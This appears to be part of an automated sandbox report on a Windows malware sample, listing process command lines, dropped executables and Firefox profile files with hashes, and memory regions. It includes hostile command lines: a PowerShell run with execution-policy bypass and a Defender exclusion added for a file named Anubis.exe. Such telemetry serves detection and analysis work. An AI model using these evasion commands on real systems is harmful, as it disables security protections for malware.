C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 4700"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\qD7QoBvD\Anubis.exe""

C:\Users\Admin\AppData\Local\Temp\10109060101\Ps7WqSx.exe

"C:\Users\Admin\AppData\Local\Temp\10109060101\Ps7WqSx.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 4700"

Network


Files


memory/3452-542-0x0000000000400000-0x0000000000840000-memory.dmp

memory/3452-544-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Windows\Tasks\Test Task17.job

MD5 a21b7adfb784803e877649b4c8e52bc3
SHA1 3d7339496dab77ef9a92ef1a99884598e64e37d1
SHA256 243e8b24a91984a9c88f9d497d5439fde8a28f1b5da0df602225a16b99f12ac4
SHA512 afa227d9ce62a2bc38cc28d2bf35d926341454ed4660dd5d50c81499208ab18a64ae3801b358ae8e90db79cc56471a74d8d9c16d1c541c33acee2ef3301b1ed5

C:\Users\Admin\AppData\Local\Temp\10108990101\zY9sqWs.exe

MD5 2bb133c52b30e2b6b3608fdc5e7d7a22
SHA1 fcb19512b31d9ece1bbe637fe18f8caf257f0a00
SHA256 b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630
SHA512 73229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f

memory/2460-567-0x0000000000180000-0x000000000048A000-memory.dmp

memory/2260-583-0x0000000000400000-0x0000000000840000-memory.dmp

memory/4124-602-0x0000000000880000-0x0000000000CCE000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\datareporting\glean\pending_pings\366b4d79-03d5-4271-843b-2635965e3802

MD5 d12343b0eed5af534db49a50c7d96e76
SHA1 65fc336e10f5592d6476b028e4668646545d345a
SHA256 58b1e06c758da3e33c7477cb5675ca19f714ffab510668d071611306d304a3c7
SHA512 13fafa0a3ac867f93f00bade13299406a37d241bd598a11418a3def8967f761e321fbba8cfe1c9545cc3303176b81452c3839ffa37716c5f1ae15f663673454b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\AlternateServices.bin

MD5 e75b8b675b70220c536db327ef0d5159
SHA1 df711e4308c48de50e4d6aab8d8ae523e55725fe
SHA256 cbd6f6f5ebcfee97ca0b4b408e12a88734f1b324c80873f058d6b6236218aee0
SHA512 68322435aef75a5184c62e000a87c333022617d4416e35149042ecece5f0e796e03806ae8af3fc31f68bf4356c2d0e321a166dabaafaf9c684bc4dd81103fa28

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\datareporting\glean\pending_pings\a1751298-c8b6-449d-87ce-762f48bbe24e

MD5 69ee9009187fc501e7a3ef04e61d2c3a
SHA1 ef5d50147dc5cf105833d45bf37cb2fc22987ce8
SHA256 9e19a098682a5a66eb73ba460d7cd78e29d38e44cd9c6b65d63a6613781bb360
SHA512 380a94251da5fd99b63c4fe75068e827d0825a60c54ec513c40a9fe0d1200c3d9496ba0cb1712f7d66f520bad27ede562d02c5abf67e9107f9a5360c6aa2f6b0

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\datareporting\glean\db\data.safe.tmp

MD5 ce9f67f18b3cc9f9ab5f4bb281371815
SHA1 85b3126902debdd28c8640b28d535c201fc32f7b
SHA256 b9b6a47beff5f3619659af693c408429a093ff7681ab2bbcfbe93fa11b6aaf1c
SHA512 dca225b96fe3c6808bfed893355b163e39f97a04f8191ec75f9b27ca4bf7b01348e5268d366091edc0407c561924ffb068c5c3f5e5292eb71861c5e06fc531b7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\datareporting\glean\db\data.safe.tmp

MD5 669adc0a4da79575660d154753155cba
SHA1 1765212aec0ea138e4bb5ca506e6262a6f9e5d98
SHA256 d35f0e6943b5bfeda572a98cd88e857d7b35b56a046930c59be1dc050487d9f8
SHA512 ecf112a9f9d88345d67b70d4d379824ffd4c8efd0ac8718edf71c74cca95a6247f6dc8f20eb5552c9417222d2d8b817234c2543dabc102d8fa7c8844f7ee4b65

memory/4124-855-0x0000000000880000-0x0000000000CCE000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\prefs.js

MD5 604dc968bb115040a0c173b8afd3a6be
SHA1 fbf8e81adaed465233d47bd463fe75bf6320839a
SHA256 8af5173123b7f1a7851e69970a654444e9441ca9c4adea10336cd567d181b7e4
SHA512 8815f260186e76f2fb319362d2299e0fbde81517f9490ce7cc8290494c2ba48258f8d64451e55a37158f5b6bfcac9630b01d16a4125d874dfedc144538d9a874

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\AlternateServices.bin

MD5 308547efe48c8ba67b472412a367e6be
SHA1 014d1aebb7dbe247acbd3020d57a7df35bd131a0
SHA256 2283bdcb57d4229f4924ab257d3ada5889694e9909bfbb1a7772d9aeb3aafdd7
SHA512 2d5b5c633f9b7c72ad2d680399715c5f2b84931d777ff13c281162af4a9b249fb8a366125579891c91a7d617acfe6d8cde515c4691bf014bf87e02253d66cedd

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\prefs-1.js

MD5 c191a48995edac2e07b36be2ec0920dd
SHA1 2512f887d6e27d93b56a88ca7eb083e076cf3cc8
SHA256 e9b6aac304cc3ab59e6546d9b2758143e1007637d1a958f6c046d67cc4f7ad2e
SHA512 cfa44fe7a02ae2cef990999dc710bb4b2af2c21258c8293d406382e5ef62a4b85d769c7e82aaace11deeda386f111826fe27f7e63f4c05a10bd016404e078ae4

memory/2460-940-0x0000000000180000-0x000000000048A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109010101\v6Oqdnc.exe

MD5 6006ae409307acc35ca6d0926b0f8685
SHA1 abd6c5a44730270ae9f2fce698c0f5d2594eac2f
SHA256 a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b
SHA512 b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718

memory/5872-953-0x0000000000EB0000-0x000000000134B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10109020101\MCxU5Fj.exe

MD5 641525fe17d5e9d483988eff400ad129
SHA1 8104fa08cfcc9066df3d16bfa1ebe119668c9097
SHA256 7a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a
SHA512 ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e

memory/5496-983-0x0000000000E30000-0x0000000000EA0000-memory.dmp

memory/6340-992-0x00000000007C0000-0x0000000000C7C000-memory.dmp

memory/2460-991-0x0000000000180000-0x000000000048A000-memory.dmp

memory/6340-994-0x00000000007C0000-0x0000000000C7C000-memory.dmp

memory/5872-996-0x0000000000EB0000-0x000000000134B000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\datareporting\glean\db\data.safe.tmp

MD5 236182fcd859f3b16c29914c2b329d3c
SHA1 8d24a1d9aab9881254b4952ff9dba42643641f26
SHA256 54be5e300544786993b440a3421ca1c3ed51b7ad6bca9d45d8d822f9f7a0f03a
SHA512 36406fbfa58a130dbbb9093d1d26bbec28921be8a999c965e1fecc20209096e7ddb652131216e74b290b7bb6b32877a24f5a18f908a4286f0e8a134deb0ec5d7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

MD5 2a461e9eb87fd1955cea740a3444ee7a
SHA1 b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

MD5 842039753bf41fa5e11b3a1383061a87
SHA1 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256 d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512 d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 09372174e83dbbf696ee732fd2e875bb
SHA1 ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256 c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512 b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\prefs.js

MD5 ae2ab8b70c6e8bcbcf522564f9e5e80c
SHA1 e9c4fc05a1b522a1deea67a5947da8e06472d2ef
SHA256 b6bedf8a08ed7c697ae9fe3013279eda7ac17c41a4d80a2aa9ee5ed60ece3117
SHA512 3977c46ed0cc5014a16c0ff91b17482a9eb258a79bf1bc6d49c51cbdf8468719b41aee81e58dc43e971c320c84cd69fe4041a6000aaaebbfb4a553a06ddeccd4

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 0a8747a2ac9ac08ae9508f36c6d75692
SHA1 b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA256 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA512 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\cache2\entries\ADF5BD09EB688DAB1F35EE02E8C35329D0E4AD89

MD5 0f677699be8371325c064eac8abd0f7e
SHA1 4fd6bed26fedde275039d9dad6be8c97b7616059
SHA256 5548d314d5fd663b47c714d0a3d6b06543e01d51ef3dbc35a5e38f5498f05f3f
SHA512 08bbd03c811175c300ae2cb719e9d7907688ebfe864f793606561c70266a0138281b47eb76e30128aea3e8bf84ddd46817996ca3884b732232f0bea4c0ef4fc8

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

MD5 bf957ad58b55f64219ab3f793e374316
SHA1 a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256 bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA512 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

MD5 daf7ef3acccab478aaa7d6dc1c60f865
SHA1 f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256 bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA512 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\cache2\entries\8DF0E9F84C5909278CF68CB55A683669F40995FB

MD5 19cfcf04e73e9e673782d0e1309556a0
SHA1 8a8374ff81e5c822fa428c85fc6052beb19df5d1
SHA256 77c70b1e3b3c3ce1c5a6b8a95e1b8cd9ec55c4da9eb96f17ecea55c7fbd04f37
SHA512 63d1e99ec7a5b9bd4f2e7878c6d50b8cfdb5a7b97e9fca712f501a6a499f35d5973f014d2444bad194d9a7f7d732e5185b6309223fd92a87476889510009008b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\datareporting\glean\db\data.safe.tmp

MD5 994006b1c190f8dd29dc5c1557d7f694
SHA1 3a6ac5d4304f4d50e8ec195b735700f9c784c36f
SHA256 e6445c0002ff328032f60c4358d809a323f561a3b364e2d5d9f683a517ff65d4
SHA512 ed32292d51e940ea27a9b47a63311ccf3e6acb4ee07afdac513b9b158fea81163f4ab8c0b5e8cc8ef94cdab27587431e10dcf56e2040a62698c622a97244c7da

C:\Users\Admin\AppData\Local\Temp\10109040101\mAtJWNv.exe

MD5 b60779fb424958088a559fdfd6f535c2
SHA1 bcea427b20d2f55c6372772668c1d6818c7328c9
SHA256 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221
SHA512 c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f

memory/3036-1267-0x0000000000CC0000-0x0000000000D20000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

MD5 398d89321278c582cbff8ba297e0c100
SHA1 e2688e1318be816d8236b215fde98707e9612395
SHA256 5701a135fd11b467c6229cdd09521a43e8f3faa8b563a1326a63053ee25fbd14
SHA512 04e2d53bf90e609d30c5f6688744d6a9188c31366a4518e68200d5dbd544ee0f98e45dd24cec23eca8203eb1d86958ddeb4e06481cc0fcf738af3fd05e941c18

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\prefs-1.js

MD5 7e3bfdc7f077a0cc43d79cc92e13157d
SHA1 588c4b9b1b43cc63f946f4bf727106db9cd95ae1
SHA256 23118f005edbb9920182e7016fe2f8dc358d8ab38a0a9ab3d96c325fece2af7d
SHA512 558e650b34d14fd6bb25ffc878e5780e21afcbff521602462195aa2adce5e47fb1154e6a9f24675e25610137fefd727cbe47ca94bb6916532dec98c9820953a0

C:\Users\Admin\AppData\Local\Temp\10109050101\FvbuInU.exe

MD5 f155a51c9042254e5e3d7734cd1c3ab0
SHA1 9d6da9f8155b47bdba186be81fb5e9f3fae00ccf
SHA256 560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af
SHA512 67ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a

C:\Users\Admin\AppData\Local\Temp\10109060101\Ps7WqSx.exe

MD5 dab2bc3868e73dd0aab2a5b4853d9583
SHA1 3dadfc676570fc26fc2406d948f7a6d4834a6e2c
SHA256 388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb
SHA512 3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8

memory/5760-3633-0x00000000007D0000-0x0000000000EBE000-memory.dmp